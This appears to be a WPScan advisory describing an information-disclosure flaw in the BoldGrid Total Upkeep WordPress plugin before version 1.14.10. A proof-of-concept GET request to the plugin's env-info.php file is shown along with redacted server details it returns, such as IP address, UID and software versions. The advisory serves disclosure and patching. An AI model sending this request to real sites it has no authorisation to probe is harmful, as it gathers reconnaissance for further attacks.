logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Total Upkeep by BoldGrid < 1.14.10 - Sensitive Data Disclosure (Server IP Address, UID etc)

Description

The plugin does not restrict access to a file containing sensitive information, such as the real server IP address, UID and so on, which may help attackers in further attacks.

Proof of Concept

GET /wp-content/plugins/boldgrid-backup/cli/env-info.php

{
    [...],
    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
86_64",
    "php_version":"7.X.X",
    "server_addr":"127.0.0.1",
    "server_name":"www.example.com",
    "server_protocol":"HTTP/1.1",
    "server_software":"Apache/2.X.XX (Ubuntu)",
    "uid":XX,
    "username":"www-data"
}

Affects Plugins

boldgrid-backup

Fixed in version 1.14.10

References

ExploitDB

49252

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

Wadeek

Verified

Yes

WPVDB ID

f2010bbb-3eb6-4a0c-ae6f-8f88c960ae92

Timeline

Publicly Published

2020-12-14 (about 4 months ago)

Added

2020-12-14 (about 4 months ago)

Last Updated

2020-12-15 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin